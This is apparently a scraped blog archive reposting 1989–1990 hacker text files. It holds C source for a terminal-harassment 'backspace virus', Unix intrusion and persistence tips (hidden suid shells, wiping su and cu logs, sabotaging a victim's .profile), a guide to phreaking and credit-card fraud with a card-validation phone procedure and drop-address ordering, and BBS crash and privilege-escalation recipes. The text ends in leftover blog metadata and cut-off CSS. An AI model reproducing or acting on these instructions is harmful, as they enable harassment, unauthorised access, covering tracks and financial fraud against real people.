if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;<br />
if (yn == 1 ) {<br />
fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);<br />
fclose(tf);<br />
printf("Critical Error Handler: %s running conflicting process\n",him);<br />
exit(1);<br />
}<br />
fflush(tf);<br />
mode.c_cc[4] = 1;<br />
mode.c_cc[5] = 0;<br />
mode.c_lflag &= ~ICANON;<br />
ioctl(0, TCSETAW, &mode);<br />
lastc = '\n';<br />
<br />
<br />
printf("Backspace / Spin Cursor set lose on: %s\n",him);<br />
while (loop == 0) {<br />
c1 = '\b'; <br />
write(fileno(tf),&c1,1); <br />
sleep(5); <br />
fprintf(tf,"\\\b|\b/\b-\b+\b"); <br />
fflush(tf); <br />
}<br />
<br />
<br />
<br />
<br />
perm:<br />
printf("Write Permissions denied!\n");<br />
exit(1);<br />
}<br />
<br />
timout()<br />
{<br />
<br />
printf("Timeout opening their tty\n");<br />
exit(1);<br />
}<br />
<br />
eof()<br />
{<br />
printf("Bye..\n");<br />
ioctl(0, TCSETAW, &oldmode);<br />
exit(0);<br />
}<br />
<br />
ex()<br />
{<br />
register i;<br />
sigs(SIG_IGN);<br />
i = fork();<br />
if (i < 0) {<br />
printf("Try again\n");<br />
goto out;<br />
}<br />
if (i == 0) {<br />
sigs((int (*)())0);<br />
execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);<br />
exit(0);<br />
}<br />
while(wait((int *)NULL) != i)<br />
;<br />
printf("!\n");<br />
out:<br />
sigs(eof);<br />
}<br />
<br />
sigs(sig)<br />
int (*sig)();<br />
{<br />
register i;<br />
for (i=0; signum[i]; i++)<br />
signal(signum[i], sig);<br />
}<br />
<br />
<br />
<br />
What the above is, is a modified version of the standard write command.<br />
What it does, is spin the cursor once, then backspace once over the<br />
screen of the user it is run on. All though, it does not physically affect<br />
input, the user thinks it does. therefore, he garbles input. The sleep(xx)<br />
can be changed to make the stuff happen more often, or less often.<br />
If you put your login name in the "YOURNAMEHERE" slot, it will protect you<br />
from getting hit by it, if someone off a Public access unix leeches the<br />
executable from your directory.<br />
You could make a shorter program that does almost the same thing, but<br />
you have to supply the terminal, observe:<br />
<br />
/* Backspace virus, by Sir Hackalot [Phaze] */<br />
#include <stdio.h><br />
#include <fcntl.h><br />
main(argc,argv)<br />
char *argv[];<br />
int argc;<br />
{<br />
int x = 1;<br />
char *device = "/dev/";<br />
FILE *histty;<br />
if (argc == 1) {<br />
printf("Bafoon. Supply a TTY.\n");<br />
exit(1);<br />
}<br />
strcat(device,argv[1]);<br />
/* Make the filename /dev/tty.. */<br />
histty = fopen(device,"a");<br />
if (histty == NULL) {<br />
printf("Error opening/writing to tty. Check their perms.\n");<br />
exit(1);<br />
}<br />
printf("BSV - Backspace virus, By Sir Hackalot.\n");<br />
printf("The Sucker on %s is getting it!\n",device);<br />
while (x == 1) {<br />
fprintf(histty,"\b\b");<br />
fflush(histty);<br />
sleep(5);<br />
}<br />
}<br />
<br />
Thats all there is to it. If you can write to their tty, you can use this on<br />
them. It sends two backspaces to them every approx. 5 seconds. You<br />
should run this program in the background. (&). Here is an example:<br />
<br />
$ who<br />
sirhack tty11<br />
loozer tty12<br />
$ bsv tty12&<br />
[1] 4566<br />
BSV - Backspace virus, by Sir Hackalot<br />
The Sucker on /dev/tty12 is getting it!<br />
$<br />
<br />
Now, it will keep "attacking" him, until he loggs of, or you kill the process<br />
(which was 4566 -- when you use &, it gives the pid [usually]).<br />
<br />
** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF<br />
method to terminate a line. However, the LF terminates a line in Unix.<br />
you must STRIP CR's on an ascii upload if you want something you upload<br />
to an editor to work right. Else, you'll see a ^M at the end of every<br />
line. I know that sucks, but you just have to compensate for it.<br />
<br />
I have a number of other programs that annoy users, but that is enough to<br />
get your imagination going, provided you are a C programmer. You can annoy<br />
users other ways. One thing you can do is screw up the user's mailbox.<br />
The way to do this is to find a binary file (30k or bigger) on the system<br />
which YOU have access to read. then, do this:<br />
<br />
$ cat binary_file | mail loozer<br />
<br />
or<br />
<br />
$ mail loozer < binary file<br />
<br />
That usually will spilt into 2 messages or more. The 1st message will<br />
have a from line.. (from you ..), but the second WILL NOT! Since it does<br />
not, the mail reader will keep exiting and giving him an error message until<br />
it gets fixed.. The way to fix it is to go to the mail box that got hit<br />
with this trick (usually only the one who got hit (or root) and do this),<br />
and edit the file, and add a from line.. like<br />
From username..<br />
<br />
then it will be ok. You can screw the user by "cat"ing a binary to his tty.<br />
say Loozer is on tty12. You can say..<br />
$ cat binary_file >/dev/tty12<br />
$<br />
It may pause for a while while it outputs it. If you want to resume what<br />
you were doing instantly, do:<br />
$ cat binary_file >/dev/tty12&<br />
[1] 4690<br />
$<br />
And he will probably logoff. You can send the output of anything to his<br />
terminal. Even what YOU do in shell. Like this:<br />
$ sh >/dev/tty12<br />
$<br />
You'll get your prompts, but you won't see the output of any commands, he<br />
will...<br />
$ ls<br />
$ banner Idiot!<br />
$ echo Dumbass!<br />
$<br />
until you type in exit, or hit ctrl-d.<br />
<br />
<br />
There are many many things you can do. You can fake a "write" to someone<br />
and make them think it was from somewhere on the other side of hell. Be<br />
creative.<br />
<br />
When you are looking for things to do, look for holes, or try to get<br />
someone to run a trojan horse that makes a suid shell. If you get<br />
someone to run a trojan that does that, you can run the suid, and log their<br />
ass off by killing their mother PID. (kill -9 whatever). Or, you can<br />
lock them out by adding "kill -1 0" to their .profile. On the subject of<br />
holes, always look for BAD suid bits. On one system thought to be invincible<br />
I was able to read/modify everyone's mail, because I used a mailer that had<br />
both the GroupID set, and the UserID set. When I went to shell from it,<br />
the program instantly changed my Effective ID back to me, so I would not be<br />
able to do anything but my regular stuff. But it was not designed to change<br />
the GROUP ID back. The sysop had blundered there. SO when I did an ID<br />
I found my group to be "Mail". Mailfiles are readble/writeable by the<br />
user "mail", and the group "mail". I then set up a sgid (set group id) shell<br />
to change my group id to "mail" when I ran it, and scanned important mail,<br />
and it got me some good info. So, be on the look out for poor permissions.<br />
<br />
Also, after you gain access, you may want to keep it. Some tips on doing so<br />
is:<br />
1. Don't give it out. If the sysadm sees that joeuser logged in 500<br />
times in one night....then....<br />
2. Don't stay on for hours at a time. They can trace you then. Also<br />
they will know it is irregular to have joeuser on for 4 hours<br />
after work.<br />
3. Don't trash the system. Don't erase important files, and don't<br />
hog inodes, or anything like that. Use the machine for a specific<br />
purpose (to leech source code, develop programs, an Email site).<br />
Dont be an asshole, and don't try to erase everything you can.<br />
4. Don't screw with users constantly. Watch their processes and<br />
run what they run. It may get you good info (snoop!)<br />
5. If you add an account, first look at the accounts already in there<br />
If you see a bunch of accounts that are just 3 letter abbrv.'s,<br />
then make yours so. If a bunch are "cln, dok, wed" or something,<br />
don't add one that is "joeuser", add one that is someone's<br />
full initials.<br />
<br />
6. When you add an account, put a woman's name in for the<br />
description, if it fits (Meaning, if only companies log on to the<br />
unix, put a company name there). People do not suspect hackers<br />
to use women's names. They look for men's names.<br />
7. Don't cost the Unix machine too much money. Ie.. don't abuse an<br />
outdial, or if it controls trunks, do not set up a bunch of dial<br />
outs. If there is a pad, don't use it unless you NEED it.<br />
8. Don't use x.25 pads. Their usage is heavily logged.<br />
9. Turn off acct logging (acct off) if you have the access to.<br />
Turn it on when you are done.<br />
10. Remove any trojan horses you set up to give you access when you<br />
get access.<br />
11. Do NOT change the MOTD file to say "I hacked this system" Just<br />
thought I'd tell you. Many MANY people do that, and lose access<br />
within 2 hours, if the unix is worth a spit.<br />
12. Use good judgement. Cover your tracks. If you use su, clean<br />
up the sulog.<br />
13. If you use cu, clean up the cu_log.<br />
14. If you use the smtp bug (wizard/debug), set up a uid shell.<br />
15. Hide all suid shells. Here's how:<br />
goto /usr<br />
(or any dir)<br />
do:<br />
# mkdir ".. "<br />
# cd ".. "<br />
# cp /bin/sh ".whatever"<br />
# chmod a+s ".whatever"<br />
The "" are NEEDED to get to the directory .. ! It will not show<br />
up in a listing, and it is hard as hell to get to by sysadms if<br />
you make 4 or 5 spaces in there (".. "), because all they will<br />
see in a directory FULL list will be .. and they won't be able to<br />
get there unless they use "" and know the spacing. "" is used<br />
when you want to do literals, or use a wildcard as part of a file<br />
name.<br />
16. Don't hog cpu time with password hackers. They really don't work<br />
well.<br />
<br />
17. Don't use too much disk space. If you archieve something to dl,<br />
dl it, then kill the archieve.<br />
18. Basically -- COVER YOUR TRACKS.<br />
<br />
Some final notes:<br />
<br />
Now, I hear lots of rumors and stories like "It is getting harder to get<br />
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true<br />
when you are dealing with WAN's, such as telenet, tyment, and the Internet,<br />
but not with local computers not on those networks. Here's the story:<br />
<br />
Over the past few years, many small companies have sprung up as VARs<br />
(Value Added Resellers) for Unix and Hardware, in order to make a fast<br />
buck. Now, these companies fast talk companies into buying whatever,<br />
and they proceed in setting up the Unix. Now, since they get paid by<br />
the hour usaually when setting one up, they spread it out over days....<br />
during these days, the system is WIDE open (if it has a dialin). Get<br />
in and add yourself to passwd before the seal it off (if they do..).<br />
Then again, after the machine is set up, they leave the defaults on the<br />
system. Why? The company needs to get in, and most VARs cannot use<br />
unix worth a shit, all they know how to do is set it up, and that is ALL.<br />
Then, they turn over the system to a company or business that USUALLY<br />
has no-one that knows what they hell they are doing with the thing, except<br />
with menus. So, they leave the system open to all...(inadvertedly..),<br />
because they are not competant. So, you could usually get on, and create<br />
havoc, and at first they will think it is a bug.. I have seen this<br />
happen ALL to many times, and it is always the same story...<br />
The VAR is out for a fast buck, so they set up the software (all they know<br />
how to do), and install any software packages ordered with it (following<br />
the step by step instructions). Then they turn it over to the business<br />
who runs a word processor, or database, or something, un aware that a<br />
"shell" or command line exists, and they probably don't even know root does.<br />
So, we will see more and more of these pop up, especially since AT&T is<br />
now bundling a version of Xwindows with their new System V, and Simultask...<br />
which will lead to even more holes. You'll find systems local to you<br />
that are easy as hell to get into, and you'll see what I mean. These<br />
VARs are really actually working for us. If a security problem arises<br />
that the business is aware of, they call the VAR to fix it... Of course,<br />
the Var gets paid by the hour, and leaves something open so you'll get in<br />
again, and they make more moolahhhh.<br />
<br />
<br />
You can use this phile for whatever you want. I can't stop you. Just<br />
to learn unix (heh) or whatever. But its YOUR ass if you get caught.<br />
Always consider the penalties before you attempt something. Sometimes<br />
it is not worth it, Sometimes it is.<br />
<br />
This phile was not meant to be comprehensive, even though it may seem like<br />
it. I have left out a LOT of techniques, and quirks, specifically to get<br />
you to learn SOMETHING on your own, and also to retain information so<br />
I will have some secrets. You may pass this file on, UNMODIFIED, to any<br />
GOOD H/P BBS. Sysops can add things to the archieve to say where<br />
it was DL'd from, or to the text viewer for the same purpose. This is<br />
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.<br />
<br />
-Sir Hackalot of PHAZE<br />
1990.<br />
<br />
</fcntl.h></stdio.h></sys></termio.h></time.h></utmp.h></signal.h></sys></sys></stdio.h></string.h></fcntl.h></stdio.h></loading..></edit></stdio.h></userlogin></sir>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-24098410085674780602010-07-25T20:41:00.000+07:002010-07-25T20:41:57.172+07:00The M.M.C. Guide to Hacking, Phreaking, Carding-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br />
<br />
<br />
Hacking:<br />
~~~~~~~~~~<br />
Hacking is a long hard process, unless you get lucky. There are many<br />
programs and aids out to make the job a lot easier, but the concept is<br />
the same no matter how you use it. First, at least on most things that you<br />
hack, you need to get some type of account or vacancy, etc... This is done<br />
by randomly entering numbers and or letters until you come up with the<br />
proper combination to find the account. Knowing the size of the account<br />
number makes this job one-hundred times easier. Thats why I suggest you<br />
find out from someone who allready has one or card one. By carding the<br />
account, it will die quickly but at least it will give you the length<br />
of the account numbers (More on that topic will be expained in the carding<br />
section). The accound numbers, do not always just contain numbers or have<br />
numbers at all in it. If it has a mix, it makes it a hell of a lot harder<br />
to get. You will just have to experiment to find out what charactors are<br />
contained in the account. Some Examples of ones that do have mixes of<br />
numbers and letters would be Pc Persuit accounts. The forms of them are<br />
usuall as such:<br />
<br />
Account: Pgp014764g<br />
Password: 23632k<br />
<br />
It looks from these that you are pretty much screw because of the way<br />
letters are mixed with numbers, thats what makes having a program so much<br />
easier. In a lot of circumstances, getting the account is the hardest part<br />
that is why having a good background of the system is a major plus in your<br />
favor.<br />
Once you have got the account, it is time to get the password for this<br />
account. Once again having the length and such makes this process not only<br />
easier, but faster. just keep entering random passwords of the length or<br />
the thought length in until you get a stoke of luck and get it. You MUST<br />
remember that 99.5 out of 100 times, this is a long process, and you have<br />
to have patience. If you don't you might as well forget ever getting on<br />
to the system or have someone else do it for you. Once you have gotten<br />
the password, look it over long and hard. Write it down and keep it,<br />
examine it. 99% of the time there is a pattern to all the account<br />
passwords. Things to look at is the password in reference to the account<br />
number. check to see if things have been added to the end or beginning<br />
like 00 or 01 or 99 of 0010 thing like that. If you see no relations,<br />
the only other way to really find out the pattern in to get another one.<br />
Look at both of them together, see if there the same or it account 400's<br />
password is 3456 and 402's password is 3458 (they go in order) then just<br />
those as a reference to other passwords, take away so much from accounts<br />
with a lower number and add the required amounts to accounts with a higher<br />
number, etc.... But bassicly, LOOK FOR A PATTERN! Once you have got the<br />
password and the account, you have got yourself a passage way in.<br />
Although this is what you do to succeed, you have to take<br />
many precautions. They do NOT like us messing with the system and they<br />
obviously want you to pay just like the others, so they will take necessary<br />
means to nail you. They trace like you wouldn't belive. They will trace<br />
right as you get on, if you happen to be unlucky, you will never know when<br />
they are doing it either, you must ALWAYS be aware of the dangers and take<br />
precautions!!! Even on things that you wouldn't think that they would trace<br />
you but, be carfull. Whether they trace depends on a couple of things, here<br />
are a few major ones:<br />
<br />
1. There bank balance<br />
2. There desire to catch you<br />
3. The amount of infestation in there system<br />
<br />
There are things that you can do to protect yourself, these are not all<br />
of them and none of them are sure fire ways, but hey, cutting down your<br />
chances of getting caught makes a world of difference, because remember,<br />
All the fun is taken away if you caught. Some things to do to protect<br />
yourself is:<br />
<br />
1. Use a diverter<br />
2. Use false information about you<br />
3. Never stay On-line too long<br />
4. Call during late or early hours, were there is most likely no one<br />
monitoring the system<br />
5. Don't call frequently or during the same hours, regulate it<br />
<br />
Once again these are not all of them but these are some of the "More"<br />
helpfull things. If you follow all the step, you can reduce the change of<br />
getting caught by about 40%.<br />
If you do get caught there is not a whole lot that you can do, but some<br />
tips are, first, don't reveal any information on what you have done. Deny<br />
all charges. Sencond, plea bargin with knowladge of things, like hacked<br />
sytems etc.. But never admit that you did it. Three, and most important,<br />
get a GOOD LAWYER!!!!!!!<br />
<br />
<br />
DIFFERENT TYPES OF SYSTEMS:<br />
<br />
Pc Persuit Cp\m<br />
Trw<br />
Unix<br />
Vmb<br />
Vms<br />
<br />
These are just a few systems, if I made a complete list There would<br />
be pratically no end to it, there are millions.<br />
<br />
<br />
<br />
Phreaking:<br />
~~~~~~~~~~~~<br />
<br />
Phreaking, Ahhhwwww, the wonderfull world of phreaking. Well to start<br />
with Phreaking is "The use of Telecommunications to others besides people<br />
of the Phone Company". Well thats my version of the definition at least.<br />
Using codes is wuit easy, there are different parts to it, the Dial-up,<br />
the code, and the number. First you will have to dial in the dial-up and<br />
on most dial ups you will get a tone or a buzz or click or something to<br />
that effect. Once you hear this, and you will know when you hear it you<br />
dial in the code. Sometime you will get another tone or beep etc. and when<br />
you do that is when you dial in the number. If you do not get another tone<br />
or whatever you just dial in the number right after you enter the code.<br />
You might have to have a test dial up to see how the tones go.<br />
In dialing the number once agian the nubers differ. You must enter the<br />
area code and then the nuber. Some require that you have a one before the<br />
area code but most that I have used do not. You can tell if the code worked<br />
right after the number has been put in not just by the error recording that<br />
you get but if right off the bat the phone begins to ring, it doesn't work.<br />
A code can also be busy. If it is busy it could mean that the code is<br />
dead or that too many people are using it at once. You might experiance<br />
this often.<br />
There are numbers that make phreaking much safer, they are called<br />
diverters. What the do is when the number that you have dial is being<br />
traced it diverts it to that number. Unless this is virgin or nobody else<br />
uses it, you will find that with in a couple of days after it is out, it<br />
will be busy, that is the annoyance about diverters, and they are also hard<br />
to get.<br />
Hacking is also put into play in phreaking by using programs to get<br />
dial ups and the codes. Getting these are done in the same way you hack<br />
anything else. Just get a program like code thief or code hacker, or make<br />
one yourself, it is quite easy.<br />
There is a danger with useing the codes. If you hack a code yourself,<br />
not just the code but the dial up amd no one else has it you can pretty well<br />
bet that it is safe. A newly hacked dial-up/code is considered "Virgin".<br />
those Ma bell is not having the problem with people phreaking off of it<br />
so they don't bother doing anything with it. But after a while, it will<br />
either Die (No Longer work) or they will start tracing off of it. The<br />
whole pain about it is, is you will never positively no when they started<br />
doing traces or things like that. The codes might be being traced but you<br />
are getting the luck of the draw. On most codes they don't trace on every<br />
call, they just file it away and watch for like the 50th or 100th caller<br />
and then that person gets nailed. You might think if they do trace every<br />
100 calls, that means you have a 1 in 100 chance of getting caught and those<br />
are really good odds. Well the odd is 100 to 1 but the is a lot of people<br />
that live in areas that they can call with that code. If you figure about<br />
10 million people could use it then about 100,000 of them are. 100,000,<br />
hummmmmmm, how odes your odds look now. In a couple minute time spand<br />
99 peoplecould have used it, and lucky you might be the 100th caller. A<br />
lot of times the take like every hundered calls and then when they get the<br />
100th caller, that don't just trace one, they trace 100, 101, 102, 103, 104<br />
200, 201, 202 etc. So you chances of getting caught when the heat is on<br />
the code is pretty good. There are a couple different types of codes and<br />
the two major ones are 1-800's and 950's. 800's can pretty much be dialed<br />
from anywhere in the states, but 950's stay in certain areas. Some 950<br />
dial ups are:<br />
<br />
9501001<br />
9500266<br />
9500355<br />
9501388<br />
<br />
And there are others, but like take me for example, where I live you<br />
cannot use 9500266. It will tell you that you cannot use that number from<br />
your dialing range or it just won't work. You might get to the point where<br />
the dial-up works but not the code. If this is the case it will say:<br />
"Invalid authorization Code"<br />
<br />
Some examples of 1-800's are as follows:<br />
<br />
1-800-255-2255<br />
1-800-759-2345<br />
1-800-959-8255<br />
<br />
There are many others but those are just a few, very few. There are<br />
also 1-800's and others that will send you directly to the operator, you<br />
must tell her the code and the number you are dialing. These are NEVER<br />
safe to use. but in one case they are alot better. I am out of town a lot<br />
so I have to use pay phones right? Well, you are safe with anything with<br />
pay phones, so that is a good way to call people. The real good thing<br />
them though, is since you must go throught th operator, the codes stay valid<br />
for up to 10 times as long as the others. But thenm again another draw back<br />
is it is not a line that you want to give real names or numbers over.<br />
Because these are often tapped, since the operator know that you used the<br />
code, they will listen in quite often, and you will never even notice.<br />
Another problem experianced with them is if you are what MMC calls<br />
"Petite Flowers",<br />
our home made word for, someone that sounds like a little kid, then they<br />
really give you a hastle about using the code.<br />
I have had a lot of people ask me if the person you are calling with the<br />
codes can get busted. The answer is "No". They cannot do anything to the<br />
person, just ask him who is calling him with the codes, and they rarely do<br />
that. Just let the person you are talking to, if they don't already know,<br />
not to tell anyone that you are calling with the codes. The phone<br />
companies do have to option of setting up a trace on that persons line and<br />
bust you when you do call him with a code. I have never seen this done but<br />
do be aware that the phone companies are made up of intellegent adults and<br />
they are very smart and can and will nail you in many ways.<br />
I am a firm beliver that you should share a the information that you<br />
other phreakers and hackers as they should do the same with you. I also<br />
see an execption, inexperianced people. They can run it for everyone be not<br />
have the knowladge and screwing up. I realize that they need someway to<br />
build themselves up to a good phreaker but be cautions in what you give to<br />
them.<br />
Codes die really often and you really have to keep up with the phone<br />
company. Its kinda of a pain to keep up with it on your own as quickly as<br />
they work but thats why there is phreaking communities and groups such<br />
as Fhp and MMC, the gives the edge to the phreakers in the way that, you<br />
have help in keeping up with the phone companies, and in most cases if<br />
the groups or communities are working well together, you can eve stay<br />
one step ahead of good 'ole Ma bell and others. You really need to find<br />
ways of getting codes either from getting acess to the phreaking sections<br />
on the pirate boards you call or throught friends, Vmb's Loops, Confrences,<br />
etc., just try to find a good connection to people that are into phreaking<br />
too.<br />
<br />
<br />
<br />
Carding:<br />
~~~~~~~~~~<br />
<br />
<br />
<br />
Although everything talked about in the text file to this point is<br />
illegal, and you will get busted if you get caught, this is one one the<br />
one that you can get in some major shit over. About the only thing I have<br />
talked about that this falls short of is hacking a government compter, and<br />
thats one of the Grand daddies of them all. Well, although it is a major<br />
crime, it is really cool!!!! This is the process in which you find the card<br />
number of someone and use it to purchase things. In order to card, there<br />
are a few things that you must have or it will not work. You will need to<br />
have........<br />
<br />
1. The Card Number<br />
2. The Experation date<br />
3. Card type (Master Card, Visa, etc...)<br />
<br />
Those are the main things tha you will need. Having the name of the owner<br />
is very helpfull but it is not a must. You can get by without it.<br />
You have to order everything you want by mail. A couple of "Beginner"<br />
carder that I talked to didn't understand how you would do it, but thats<br />
when they had the misconception that you actually go to the store and<br />
purchase things. That is a complete No, no. You do everything from a<br />
phone ordering service.<br />
When you call make sure that you are a t a pay phone. Don't do it<br />
your house or anywhere where it can come back to you. When you order<br />
the merchandice, once again do send it to anywhere that it can come back to<br />
you like your home, work, etc. Find a vacant house or building or anywhere<br />
else that you can send it to. Also, don't send it to a P.O. box that you<br />
have, just as dangerous. When you do order it and you think its around the<br />
time that you will be reciving it, check the mailbox frequently. But do it<br />
during odd hours. I mean, hows it going to look you taking a package from a<br />
vacant house?<br />
Most bills are sent at the end of the month or at the biginning, so<br />
try to time it to where the bill won't come to the person untill a couple of<br />
days after you have recived the package. Ok heres how to figure it. I<br />
have found out that the bills are sent out up around the 26-30th of the<br />
month, so they will actually recive the bill around the 31-4th. Have it<br />
sent right after you think the bill has been sent. Find what you want, but<br />
try to order it from the place that guarentees the fastest delivery. When<br />
you order the item, make sure they have it in stock and don't have to get<br />
the item in first. Order the highest class of delivery but not COD or<br />
next day service. Thats cutting it too close. It should take around 2-4<br />
weeks before you get it and if you timed it right, then it sound get there<br />
right before the person gets the bill. You need to have it in your<br />
possesion before the bill gets to the person because if they complain, they<br />
can keep it from being sent, or watch who actually gets it even while its<br />
going throught the mail process. Don't order more than a couple of things<br />
or overcharge the card, if the people at the Credit card office, see<br />
irregular charging on the card, they will follow up on it.<br />
To actually order the item you will call up the place that you will<br />
be ordering from, and when the operator answers let her know what you need<br />
to as far as what you are purchasing, etc. When she ask how you will be<br />
paying just tell her "Charge" and the the type of card like Master Card,<br />
Visa, ect. Then Tell them your name, if you don't know the name of the<br />
actuall owner of the card, Make up a false name that has NO relation to<br />
your name, not the same first, last middle what ever, nothing relating to<br />
your real name. Then continue answering all the operators questions,<br />
address (Not your own remember!) state, area code etc. They will also ask<br />
for your phone number. Make one up, not your own. If something happens<br />
to go wrong as far as delivery or if they are checking if you are who you<br />
say, then your screwed, unless of course, hehehe, the number is ALWAYS<br />
busy. Find the busiest number there is and leave them that. When they<br />
ask for the card number and experation, just tell them and do what all<br />
else you need. Wish them a good day, and hope you get it.<br />
Ok heres how you check if the card is good, and how much money<br />
can be charged on the card.......<br />
<br />
1. Dail 1-800-554-2265<br />
<br />
2. it will ask for the type of the card. you must put in 10 for Master<br />
Card and 20 for Visa, I am not sure about the others.<br />
<br />
3. Next it will ask for the Identification. You will need to enter<br />
1067<br />
<br />
4. After all that you will have to enter the Mecrchant number, which<br />
you will either need to put in 24 or 52. One of them should work.<br />
<br />
5. You will then have to enter (When Prompted) the card number itself.<br />
<br />
6. Next, the experation date of the card.<br />
<br />
7. Last but not least the amount you want to try to get on the card.<br />
The procedure for this is enter dollars, astricks, then cents.<br />
(Example:)<br />
100*30 = One hundred dollars and thirty cents.<br />
<br />
One thing I do need to mention, after you type in everything you must press<br />
pound (#). Like when it asks you for the type of card, if you had a Master<br />
Card you would put: 10#. when it asked for identification you would enter<br />
1067#. If it says invalid, that either means that the card is no good or<br />
you can't charge that amount on the card. Try it again, but try a lower<br />
amount. If you get down to $1 and it still doesn't work, hehehe, you can<br />
probably guess that the card is no good.<br />
You might not be ordering just merchandice you might be ordering<br />
accounts and things like that and if you are, fine, but you have to<br />
remember, the accounts do not stay good for very long, the owner of the<br />
card gets the bill, complains and its no longer any good. And when you<br />
card and account, Nine out of ten times, they won't kill the account, they<br />
will trace in and that is when you butts really in a sling. So carding<br />
accounts and things, isn't the safest way to go, of course. nothing we<br />
have talked about it, right?<br />
<br />
Conclusion:<br />
~~~~~~~~~~~~~~<br />
<br />
Well thats about it for now, there should be a BIG newsletter by<br />
The Mickey Mouse Club comming out soon that you have to be sure NOT to miss.<br />
I sincerely hope that you have gotten alot out of this file and I would like<br />
to ask for suggestions and ideas to make MMC a better orginazation. At this<br />
time myself and Cardiac Arresst have a VMB at:<br />
<br />
1-800-444-7207 [Ext] 4001.<br />
<br />
All ideas and suggestions, please bring there. Also, since your making<br />
the trip anyways, bring along some phreaking codes and all and any types<br />
of accounts. I would be greatly appreciated by:<br />
<br />
The Mickey Mouse Club.<br />
09/89<br />
<br />
<br />
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<br />
<br />
Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-17174418243483092222010-07-25T20:40:00.000+07:002010-07-25T20:40:33.502+07:00BBS CRASHING TECHNIQUES[:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:]<br />
[:=:] [:=:]<br />
[:=:] New Wave presents... [:=:]<br />
[:=:] [:=:]<br />
[:=:] [:=:]<br />
[:=:] BBS CRASHING TECHNIQUES [:=:]<br />
[:=:] [:=:]<br />
[:=:] [:=:]<br />
[:=:] [:=:]<br />
[:=:] [:=:]<br />
[:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:][:=:]<br />
<br />
- File Formatted for 80 columns like it or not -<br />
<br />
To start off with, I'd just like to say this file is a collectithe<br />
latest BBS crashes. Many people have grudges and reasons to 'crash' a bbs,<br />
well this file is served as an aid to them and also to sysops who want to<br />
prevent their own bbs' from being attacked. And that's enuff talk for now,<br />
let's get on with the good stuff (everything is in cookbook format for speedy<br />
reading).<br />
<br />
<br />
[-=: Apple Net :=-]<br />
<br />
<br />
1. Post a message (can be bbs,feedback,newuser etc.)<br />
2. Press space bar util you get to the very last line (40th col.)<br />
3. type ctrl-D<br />
4. (after the word wrap to next line) Type any dos command (Preferrably FP)<br />
5. get into editor ('/E')<br />
6. list the program<br />
7. You should be in basic or executing whatever dos command you entered<br />
<br />
<br />
Requirements:<br />
<br />
- Must have wordwrap activated<br />
- 40 columns mode should be activated<br />
- Their must be a (L)ist command in the editor<br />
<br />
<br />
[-=: Telecat 2.x & 3.0 :=-]<br />
<br />
<br />
2.x<br />
-----<br />
<br />
<br />
1. Go to the board section<br />
2. Newscan the last board accessable<br />
3. After the first message, type 'B' at the prompt (To jump to next board)<br />
<br />
<br />
Results:<br />
<br />
- If it was the last board on the bbs, chances arethat will break into Basic<br />
- If not, then it will go on to the next board (which is handy and surpassess<br />
the security level crap)<br />
<br />
3.0<br />
-----<br />
<br />
<br />
1. Post Message<br />
2. Type a line of text<br />
3. type ctrl-V <br />
<br />
<br />
Results:<br />
<br />
- This should either hang the system or break into basic<br />
- It is trying to center the line but it fucks up<br />
<br />
[-=: GBBS Pro :=-]<br />
<br />
Method 1:<br />
<br />
1. Go the the editor<br />
2. Hold down tab key<br />
3. or press space and type ctrl-C<br />
<br />
Method 2:<br />
<br />
1. Upload to a full volume<br />
<br />
Method 3:<br />
<br />
1. read the userlist<br />
2. hang up when it gets to the Sysop<br />
3. call back and log on and you'll be a sysop<br />
<br />
[-=: Proving Grounds :=-]<br />
<br />
Method 1:<br />
<br />
1. (On older versions) Enter decimal or negative numbers<br />
<br />
Method 2:<br />
<br />
1. Call board and enter the user number of a Remote sysop<br />
2. Enter any bs for a pw<br />
3. Do the same thing again (more garbage the 2nd time it asks)<br />
4. Now enter your real number and pass<br />
5. At the first input prompt type 'Remote'<br />
6. This should give you the Remote Sysop menu and access<br />
<br />
Notes:<br />
<br />
- Using Sysop's user# will give you 10 extra minutes on system<br />
- The second method works only on unmoded newer versions of Proving Grounds<br />
<br />
Ok, well that about wraps it up. Remember, all these crashes work only on<br />
unmoded boards (which are on the most part run by leeches and geeks).<br />
<br />
If you have any questions or more tips for Vol.2 then leave me mail on<br />
Halifax 20megs (301)445/5897 or Eastern Alliance 10megs (201)327/5725<br />
and where else you see me. Both are fine boards. Have Fun!<br />
<br />
[-------------<the band="">--------------]<br />
Mistywood BBS/AE/CF........818/335-5651<br />
Mistywood // BBS...........602/220-9363<br />
The Wizards Guild..........409/696-8226<br />
Den o/Crude Tort...........617/832-9229<br />
Sirius Cybernetics.........808/528-2436<br />
[-------------------------------------]<br />
<br />
<br />
DOWNLOADED FROM P-80 SYSTEMS.....<br />
<br />
</the>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com1tag:blogger.com,1999:blog-4044212408950825345.post-23484834419799340942010-07-24T22:17:00.000+07:002010-07-25T20:37:19.903+07:00Hacking Telnet FTP<div style="color: #eeeeee;"><style>
<!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:0 0 0 0 0 0 0 0 0 0;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1073750139 0 0 159 0;}
@font-face
{font-family:Verdana;
